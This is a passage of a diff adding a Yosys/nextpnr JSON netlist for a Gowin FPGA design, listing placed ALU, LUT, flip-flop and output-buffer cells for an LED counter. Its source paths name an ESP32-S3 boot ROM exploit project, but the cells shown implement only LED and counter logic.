"COUT": [ 7782 ], + "CIN": [ 7785 ] + } + }, + "led_run_DFFSE_Q_D_LUT3_F_I0_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT": { + "hide_name": 0, + "type": "ALU", + "parameters": { + "ALU_MODE": "00000000000000000000000000000010" + }, + "attributes": { + "BEL_STRENGTH": "00000000000000000000000000000001", + "NEXTPNR_BEL": "X3Y13/ALU3", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:44.57-44.116|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/arith_map.v:57.7-63.5", + "module_not_derived": "00000000000000000000000000000001" + }, + "port_directions": { + "I2": "input", + "SUM": "output", + "I3": "input", + "I1": "input", + "I0": "input", + "COUT": "output", + "CIN": "input" + }, + "connections": { + "I2": [ 8056 ], + "SUM": [ 7783 ], + "I3": [ 8057 ], + "I1": [ 7580 ], + "I0": [ 8057 ], + "COUT": [ 7779 ], + "CIN": [ 7782 ] + } + }, + "led_run_DFFSE_Q_D_LUT3_F_I0_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT": { + "hide_name": 0, + "type": "ALU", + "parameters": { + "ALU_MODE": "00000000000000000000000000000010" + }, + "attributes": { + "BEL_STRENGTH": "00000000000000000000000000000001", + "NEXTPNR_BEL": "X3Y13/ALU4", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:44.57-44.116|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/arith_map.v:57.7-63.5", + "module_not_derived": "00000000000000000000000000000001" + }, + "port_directions": { + "I2": "input", + "SUM": "output", + "I3": "input", + "I1": "input", + "I0": "input", + "COUT": "output", + "CIN": "input" + }, + "connections": { + "I2": [ 8056 ], + "SUM": [ 7780 ], + "I3": [ 8057 ], + "I1": [ 7575 ], + "I0": [ 8057 ], + "COUT": [ 7776 ], + "CIN": [ 7779 ] + } + }, + "led_run_DFFSE_Q_D_LUT3_F_I0_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT": { + "hide_name": 0, + "type": "ALU", + "parameters": { + "ALU_MODE": "00000000000000000000000000000010" + }, + "attributes": { + "BEL_STRENGTH": "00000000000000000000000000000001", + "NEXTPNR_BEL": "X3Y13/ALU5", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:44.57-44.116|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/arith_map.v:57.7-63.5", + "module_not_derived": "00000000000000000000000000000001" + }, + "port_directions": { + "I2": "input", + "SUM": "output", + "I3": "input", + "I1": "input", + "I0": "input", + "COUT": "output", + "CIN": "input" + }, + "connections": { + "I2": [ 8056 ], + "SUM": [ 7777 ], + "I3": [ 8057 ], + "I1": [ 7570 ], + "I0": [ 8057 ], + "COUT": [ 7773 ], + "CIN": [ 7776 ] + } + }, + "led_run_DFFSE_Q_D_LUT3_F_I0_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT": { + "hide_name": 0, + "type": "ALU", + "parameters": { + "ALU_MODE": "00000000000000000000000000000010" + }, + "attributes": { + "BEL_STRENGTH": "00000000000000000000000000000001", + "NEXTPNR_BEL": "X4Y13/ALU0", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:44.57-44.116|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/arith_map.v:57.7-63.5", + "module_not_derived": "00000000000000000000000000000001" + }, + "port_directions": { + "I2": "input", + "SUM": "output", + "I3": "input", + "I1": "input", + "I0": "input", + "COUT": "output", + "CIN": "input" + }, + "connections": { + "I2": [ 8056 ], + "SUM": [ 7774 ], + "I3": [ 8057 ], + "I1": [ 7564 ], + "I0": [ 8057 ], + "COUT": [ 7770 ], + "CIN": [ 7773 ] + } + }, + "led_run_DFFSE_Q_D_LUT3_F_I0_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT": { + "hide_name": 0, + "type": "ALU", + "parameters": { + "ALU_MODE": "00000000000000000000000000000010" + }, + "attributes": { + "BEL_STRENGTH": "00000000000000000000000000000001", + "NEXTPNR_BEL": "X4Y13/ALU1", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:44.57-44.116|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/arith_map.v:57.7-63.5", + "module_not_derived": "00000000000000000000000000000001" + }, + "port_directions": { + "I2": "input", + "SUM": "output", + "I3": "input", + "I1": "input", + "I0": "input", + "COUT": "output", + "CIN": "input" + }, + "connections": { + "I2": [ 8056 ], + "SUM": [ 7771 ], + "I3": [ 8057 ], + "I1": [ 7681 ], + "I0": [ 8057 ], + "COUT": [ 7767 ], + "CIN": [ 7770 ] + } + }, + "led_run_DFFSE_Q_D_LUT3_F_I0_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT": { + "hide_name": 0, + "type": "ALU", + "parameters": { + "ALU_MODE": "00000000000000000000000000000010" + }, + "attributes": { + "BEL_STRENGTH": "00000000000000000000000000000001", + "NEXTPNR_BEL": "X4Y13/ALU2", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:44.57-44.116|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/arith_map.v:57.7-63.5", + "module_not_derived": "00000000000000000000000000000001" + }, + "port_directions": { + "I2": "input", + "SUM": "output", + "I3": "input", + "I1": "input", + "I0": "input", + "COUT": "output", + "CIN": "input" + }, + "connections": { + "I2": [ 8056 ], + "SUM": [ 7768 ], + "I3": [ 8057 ], + "I1": [ 7674 ], + "I0": [ 8057 ], + "COUT": [ 7764 ], + "CIN": [ 7767 ] + } + }, + "led_run_DFFSE_Q_D_LUT3_F_I0_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT": { + "hide_name": 0, + "type": "ALU", + "parameters": { + "ALU_MODE": "00000000000000000000000000000010" + }, + "attributes": { + "BEL_STRENGTH": "00000000000000000000000000000001", + "NEXTPNR_BEL": "X4Y13/ALU3", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:44.57-44.116|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/arith_map.v:57.7-63.5", + "module_not_derived": "00000000000000000000000000000001" + }, + "port_directions": { + "I2": "input", + "SUM": "output", + "I3": "input", + "I1": "input", + "I0": "input", + "COUT": "output", + "CIN": "input" + }, + "connections": { + "I2": [ 8056 ], + "SUM": [ 7765 ], + "I3": [ 8057 ], + "I1": [ 7668 ], + "I0": [ 8057 ], + "COUT": [ 7761 ], + "CIN": [ 7764 ] + } + }, + "led_run_DFFSE_Q_D_LUT3_F_I0_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT": { + "hide_name": 0, + "type": "ALU", + "parameters": { + "ALU_MODE": "00000000000000000000000000000010" + }, + "attributes": { + "BEL_STRENGTH": "00000000000000000000000000000001", + "NEXTPNR_BEL": "X4Y13/ALU4", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:44.57-44.116|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/arith_map.v:57.7-63.5", + "module_not_derived": "00000000000000000000000000000001" + }, + "port_directions": { + "I2": "input", + "SUM": "output", + "I3": "input", + "I1": "input", + "I0": "input", + "COUT": "output", + "CIN": "input" + }, + "connections": { + "I2": [ 8056 ], + "SUM": [ 7762 ], + "I3": [ 8057 ], + "I1": [ 7663 ], + "I0": [ 8057 ], + "COUT": [ 7758 ], + "CIN": [ 7761 ] + } + }, + "led_run_DFFSE_Q_D_LUT3_F_I0_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT": { + "hide_name": 0, + "type": "ALU", + "parameters": { + "ALU_MODE": "00000000000000000000000000000010" + }, + "attributes": { + "BEL_STRENGTH": "00000000000000000000000000000001", + "NEXTPNR_BEL": "X4Y13/ALU5", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:44.57-44.116|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/arith_map.v:57.7-63.5", + "module_not_derived": "00000000000000000000000000000001" + }, + "port_directions": { + "I2": "input", + "SUM": "output", + "I3": "input", + "I1": "input", + "I0": "input", + "COUT": "output", + "CIN": "input" + }, + "connections": { + "I2": [ 8056 ], + "SUM": [ 7759 ], + "I3": [ 8057 ], + "I1": [ 7657 ], + "I0": [ 8057 ], + "COUT": [ 7755 ], + "CIN": [ 7758 ] + } + }, + "led_run_DFFSE_Q_D_LUT3_F_I0_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT": { + "hide_name": 0, + "type": "ALU", + "parameters": { + "ALU_MODE": "00000000000000000000000000000010" + }, + "attributes": { + "BEL_STRENGTH": "00000000000000000000000000000001", + "NEXTPNR_BEL": "X5Y13/ALU0", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:44.57-44.116|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/arith_map.v:57.7-63.5", + "module_not_derived": "00000000000000000000000000000001" + }, + "port_directions": { + "I2": "input", + "SUM": "output", + "I3": "input", + "I1": "input", + "I0": "input", + "COUT": "output", + "CIN": "input" + }, + "connections": { + "I2": [ 8056 ], + "SUM": [ 7756 ], + "I3": [ 8057 ], + "I1": [ 7651 ], + "I0": [ 8057 ], + "COUT": [ 7752 ], + "CIN": [ 7755 ] + } + }, + "led_run_DFFSE_Q_D_LUT3_F_I0_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT": { + "hide_name": 0, + "type": "ALU", + "parameters": { + "ALU_MODE": "00000000000000000000000000000010" + }, + "attributes": { + "BEL_STRENGTH": "00000000000000000000000000000001", + "NEXTPNR_BEL": "X5Y13/ALU1", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:44.57-44.116|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/arith_map.v:57.7-63.5", + "module_not_derived": "00000000000000000000000000000001" + }, + "port_directions": { + "I2": "input", + "SUM": "output", + "I3": "input", + "I1": "input", + "I0": "input", + "COUT": "output", + "CIN": "input" + }, + "connections": { + "I2": [ 8056 ], + "SUM": [ 7753 ], + "I3": [ 8057 ], + "I1": [ 7645 ], + "I0": [ 8057 ], + "COUT": [ 7749 ], + "CIN": [ 7752 ] + } + }, + "led_run_DFFSE_Q_D_LUT3_F_I0_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT": { + "hide_name": 0, + "type": "ALU", + "parameters": { + "ALU_MODE": "00000000000000000000000000000010" + }, + "attributes": { + "BEL_STRENGTH": "00000000000000000000000000000001", + "NEXTPNR_BEL": "X5Y13/ALU2", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:44.57-44.116|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/arith_map.v:57.7-63.5", + "module_not_derived": "00000000000000000000000000000001" + }, + "port_directions": { + "I2": "input", + "SUM": "output", + "I3": "input", + "I1": "input", + "I0": "input", + "COUT": "output", + "CIN": "input" + }, + "connections": { + "I2": [ 8056 ], + "SUM": [ 7750 ], + "I3": [ 8057 ], + "I1": [ 7618 ], + "I0": [ 8057 ], + "COUT": [ 7746 ], + "CIN": [ 7749 ] + } + }, + "led_run_DFFSE_Q_D_LUT3_F_I0_ALU_COUT_CIN_ALU_COUT": { + "hide_name": 0, + "type": "ALU", + "parameters": { + "ALU_MODE": "00000000000000000000000000000010" + }, + "attributes": { + "BEL_STRENGTH": "00000000000000000000000000000001", + "NEXTPNR_BEL": "X5Y13/ALU3", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:44.57-44.116|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/arith_map.v:57.7-63.5", + "module_not_derived": "00000000000000000000000000000001" + }, + "port_directions": { + "I2": "input", + "SUM": "output", + "I3": "input", + "I1": "input", + "I0": "input", + "COUT": "output", + "CIN": "input" + }, + "connections": { + "I2": [ 8056 ], + "SUM": [ 7747 ], + "I3": [ 8057 ], + "I1": [ 7561 ], + "I0": [ 8057 ], + "COUT": [ 7743 ], + "CIN": [ 7746 ] + } + }, + "led_run_DFFSE_Q_D_LUT3_F_I0_ALU_COUT": { + "hide_name": 0, + "type": "ALU", + "parameters": { + "ALU_MODE": "00000000000000000000000000000010" + }, + "attributes": { + "BEL_STRENGTH": "00000000000000000000000000000001", + "NEXTPNR_BEL": "X5Y13/ALU4", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:44.57-44.116|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/arith_map.v:57.7-63.5", + "module_not_derived": "00000000000000000000000000000001" + }, + "port_directions": { + "I2": "input", + "SUM": "output", + "I3": "input", + "I1": "input", + "I0": "input", + "COUT": "output", + "CIN": "input" + }, + "connections": { + "I2": [ 8056 ], + "SUM": [ 7744 ], + "I3": [ 8057 ], + "I1": [ 7558 ], + "I0": [ 8057 ], + "COUT": [ 8064 ], + "CIN": [ 7743 ] + } + }, + "led_run_DFFSE_Q_D_LUT3_F": { + "hide_name": 0, + "type": "LUT3", + "parameters": { + "INIT": "11100010" + }, + "attributes": { + "BEL_STRENGTH": "00000000000000000000000000000001", + "NEXTPNR_BEL": "X5Y12/LUT6", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:143.23-144.37", + "module_not_derived": "00000000000000000000000000000001" + }, + "port_directions": { + "I2": "input", + "I1": "input", + "I0": "input", + "F": "output" + }, + "connections": { + "I2": [ 7741 ], + "I1": [ 7740 ], + "I0": [ 7739 ], + "F": [ 7735 ] + } + }, + "led_run_DFFSE_Q": { + "hide_name": 0, + "type": "DFFSE", + "parameters": { + }, + "attributes": { + "BEL_STRENGTH": "00000000000000000000000000000001", + "NEXTPNR_BEL": "X2Y8/DFF5", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:31.1-67.4|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:67.8-67.66", + "module_not_derived": "00000000000000000000000000000001" + }, + "port_directions": { + "SET": "input", + "Q": "output", + "D": "input", + "CLK": "input", + "CE": "input" + }, + "connections": { + "SET": [ 8057 ], + "Q": [ 7737 ], + "D": [ 7735 ], + "CLK": [ 7419 ], + "CE": [ 7556 ] + } + }, + "led_OBUF_O_5": { + "hide_name": 0, + "type": "OBUF", + "parameters": { + "NET_I": "NET", + "NET_O": "NET" + }, + "attributes": { + "BEL_STRENGTH": "00000000000000000000000000000101", + "NEXTPNR_BEL": "X0Y14/IOBA", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:7.18-7.21", + "keep": "00000000000000000000000000000001" + }, + "port_directions": { + "O": "output", + "I": "input" + }, + "connections": { + "O": [ 7733 ], + "I": [ 7715 ] + } + }, + "led_OBUF_O_4": { + "hide_name": 0, + "type": "OBUF", + "parameters": { + "NET_I": "NET", + "NET_O": "NET" + }, + "attributes": { + "BEL_STRENGTH": "00000000000000000000000000000101", + "NEXTPNR_BEL": "X0Y15/IOBB", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:7.18-7.21", + "keep": "00000000000000000000000000000001" + }, + "port_directions": { + "O": "output", + "I": "input" + }, + "connections": { + "O": [ 7731 ], + "I": [ 7710 ] + } + }, + "led_OBUF_O_3": { + "hide_name": 0, + "type": "OBUF", + "parameters": { + "NET_I": "NET", + "NET_O": "NET" + }, + "attributes": { + "BEL_STRENGTH": "00000000000000000000000000000101", + "NEXTPNR_BEL": "X0Y20/IOBB", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:7.18-7.21", + "keep": "00000000000000000000000000000001" + }, + "port_directions": { + "O": "output", + "I": "input" + }, + "connections": { + "O": [ 7729 ], + "I": [ 7704 ] + } + }, + "led_OBUF_O_2": { + "hide_name": 0, + "type": "OBUF", + "parameters": { + "NET_I": "NET", + "NET_O": "NET" + }, + "attributes": { + "BEL_STRENGTH": "00000000000000000000000000000101", + "NEXTPNR_BEL": "X0Y21/IOBB", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:7.18-7.21", + "keep": "00000000000000000000000000000001" + }, + "port_directions": { + "O": "output", + "I": "input" + }, + "connections": { + "O": [ 7727 ], + "I": [ 7699 ] + } + }, + "led_OBUF_O_1": { + "hide_name": 0, + "type": "OBUF", + "parameters": { + "NET_I": "NET", + "NET_O": "NET" + }, + "attributes": { + "BEL_STRENGTH": "00000000000000000000000000000101", + "NEXTPNR_BEL": "X0Y24/IOBB", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:7.18-7.21", + "keep": "00000000000000000000000000000001" + }, + "port_directions": { + "O": "output", + "I": "input" + }, + "connections": { + "O": [ 7725 ], + "I": [ 7693 ] + } + }, + "led_OBUF_O": { + "hide_name": 0, + "type": "OBUF", + "parameters": { + "NET_I": "NET", + "NET_O": "NET" + }, + "attributes": { + "BEL_STRENGTH": "00000000000000000000000000000101", + "NEXTPNR_BEL": "X0Y25/IOBB", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:7.18-7.21", + "keep": "00000000000000000000000000000001" + }, + "port_directions": { + "O": "output", + "I": "input" + }, + "connections": { + "O": [ 7723 ], + "I": [ 7689 ] + } + }, + "ledCounter_DFFRE_Q_D_ALU_SUM": { + "hide_name": 0, + "type": "ALU", + "parameters": { + "ALU_MODE": "00000000000000000000000000000010" + }, + "attributes": { + "BEL_STRENGTH": "00000000000000000000000000000001", + "NEXTPNR_BEL": "X3Y14/ALU0", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:53.26-53.40|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/arith_map.v:57.7-63.5", + "module_not_derived": "00000000000000000000000000000001" + }, + "port_directions": { + "I2": "input", + "SUM": "output", + "I3": "input", + "I1": "input", + "I0": "input", + "COUT": "output", + "CIN": "input" + }, + "connections": { + "I2": [ 8056 ], + "SUM": [ 7688 ], + "I3": [ 8056 ], + "I1": [ 7689 ], + "I0": [ 8057 ], + "COUT": [ 7721 ], + "CIN": [ 7696 ] + } + }, + "ledCounter_DFFRE_Q_5_D_LUT1_F": { + "hide_name": 0, + "type": "LUT1", + "parameters": { + "INIT": "01" + }, + "attributes": { + "BEL_STRENGTH": "00000000000000000000000000000001", + "NEXTPNR_BEL": "X1Y14/LUT0", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:135.23-136.15", + "module_not_derived": "00000000000000000000000000000001" + }, + "port_directions": { + "I0": "input", + "F": "output" + }, + "connections": { + "I0": [ 7715 ], + "F": [ 7718 ] + } + }, + "ledCounter_DFFRE_Q_5": { + "hide_name": 0, + "type": "DFFRE", + "parameters": { + }, + "attributes": { + "BEL_STRENGTH": "00000000000000000000000000000001", + "NEXTPNR_BEL": "X1Y14/DFF3", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:31.1-67.4|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:43.8-43.68", + "module_not_derived": "00000000000000000000000000000001" + }, + "port_directions": { + "RESET": "input", + "Q": "output", + "D": "input", + "CLK": "input", + "CE": "input" + }, + "connections": { + "RESET": [ 7690 ], + "Q": [ 7715 ], + "D": [ 7718 ], + "CLK": [ 7419 ], + "CE": [ 7687 ] + } + }, + "ledCounter_DFFRE_Q_4_D_ALU_SUM_CIN_ALU_COUT": { + "hide_name": 0, + "type": "ALU", + "parameters": { + "ALU_MODE": "00000000000000000000000000000010" + }, + "attributes": { + "BEL_STRENGTH": "00000000000000000000000000000001", + "NEXTPNR_BEL": "X2Y14/ALU1", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:53.26-53.40|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/arith_map.v:57.7-63.5", + "module_not_derived": "00000000000000000000000000000001" + }, + "port_directions": { + "I2": "input", + "SUM": "output", + "I3": "input", + "I1": "input", + "I0": "input", + "COUT": "output", + "CIN": "input" + }, + "connections": { + "I2": [ 8056 ], + "SUM": [ 7716 ], + "I3": [ 8056 ], + "I1": [ 7715 ], + "I0": [ 8056 ], + "COUT": [ 7712 ], + "CIN": [ 8065 ] + } + }, + "ledCounter_DFFRE_Q_4_D_ALU_SUM": { + "hide_name": 0, + "type": "ALU", + "parameters": { + "ALU_MODE": "00000000000000000000000000000010" + }, + "attributes": { + "BEL_STRENGTH": "00000000000000000000000000000001", + "NEXTPNR_BEL": "X2Y14/ALU2", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:53.26-53.40|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/arith_map.v:57.7-63.5", + "module_not_derived": "00000000000000000000000000000001" + }, + "port_directions": { + "I2": "input", + "SUM": "output", + "I3": "input", + "I1": "input", + "I0": "input", + "COUT": "output", + "CIN": "input" + }, + "connections": { + "I2": [ 8056 ], + "SUM": [ 7708 ], + "I3": [ 8056 ], + "I1": [ 7710 ], + "I0": [ 8057 ], + "COUT": [ 7706 ], + "CIN": [ 7712 ] + } + }, + "ledCounter_DFFRE_Q_4": { + "hide_name": 0, + "type": "DFFRE", + "parameters": { + }, + "attributes": { + "BEL_STRENGTH": "00000000000000000000000000000001", + "NEXTPNR_BEL": "X2Y14/DFF2", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:31.1-67.4|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:43.8-43.68", + "module_not_derived": "00000000000000000000000000000001" + }, + "port_directions": { + "RESET": "input", + "Q": "output", + "D": "input", + "CLK": "input", + "CE": "input" + }, + "connections": { + "RESET": [ 7690 ], + "Q": [ 7710 ], + "D": [ 7708 ], + "CLK": [ 7419 ], + "CE": [ 7687 ] + } + }, + "ledCounter_DFFRE_Q_3_D_ALU_SUM": { + "hide_name": 0, + "type": "ALU", + "parameters": { + "ALU_MODE": "00000000000000000000000000000010" + }, + "attributes": { + "BEL_STRENGTH": "00000000000000000000000000000001", + "NEXTPNR_BEL": "X2Y14/ALU3", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:53.26-53.40|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/arith_map.v:57.7-63.5", + "module_not_derived": "00000000000000000000000000000001" + }, + "port_directions": { + "I2": "input", + "SUM": "output", + "I3": "input", + "I1": "input", + "I0": "input", + "COUT": "output", + "CIN": "input" + }, + "connections": { + "I2": [ 8056 ], + "SUM": [ 7703 ], + "I3": [ 8056 ], + "I1": [ 7704 ], + "I0": [ 8057 ], + "COUT": [ 7701 ], + "CIN": [ 7706 ] + } + }, + "ledCounter_DFFRE_Q_3": { + "hide_name": 0, + "type": "DFFRE", + "parameters": { + }, + "attributes": { + "BEL_STRENGTH": "00000000000000000000000000000001", + "NEXTPNR_BEL": "X2Y14/DFF3", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:31.1-67.4|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:43.8-43.68", + "module_not_derived": "00000000000000000000000000000001" + }, + "port_directions": { + "RESET": "input", + "Q": "output", + "D": "input", + "CLK": "input", + "CE": "input" + }, + "connections": { + "RESET": [ 7690 ], + "Q": [ 7704 ], + "D": [ 7703 ], + "CLK": [ 7419 ], + "CE": [ 7687 ] + } + }, + "ledCounter_DFFRE_Q_2_D_ALU_SUM": { + "hide_name": 0, + "type": "ALU", + "parameters": { + "ALU_MODE": "00000000000000000000000000000010" + }, + "attributes": { + "BEL_STRENGTH": "00000000000000000000000000000001", + "NEXTPNR_BEL": "X2Y14/ALU4", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:53.26-53.40|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/arith_map.v:57.7-63.5", + "module_not_derived": "00000000000000000000000000000001" + }, + "port_directions": { + "I2": "input", + "SUM": "output", + "I3": "input", + "I1": "input", + "I0": "input", + "COUT": "output", + "CIN": "input" + }, + "connections": { + "I2": [ 8056 ], + "SUM": [ 7698 ], + "I3": [ 8056 ], + "I1": [ 7699 ], + "I0": [ 8057 ], + "COUT": [ 7695 ], + "CIN": [ 7701 ] + } + }, + "ledCounter_DFFRE_Q_2": { + "hide_name": 0, + "type": "DFFRE", + "parameters": { + }, + "attributes": { + "BEL_STRENGTH": "00000000000000000000000000000001", + "NEXTPNR_BEL": "X2Y14/DFF4", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:31.1-67.4|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:43.8-43.68", + "module_not_derived": "00000000000000000000000000000001" + }, + "port_directions": { + "RESET": "input", + "Q": "output", + "D": "input", + "CLK": "input", + "CE": "input" + }, + "connections": { + "RESET": [ 7690 ], + "Q": [ 7699 ], + "D": [ 7698 ], + "CLK": [ 7419 ], 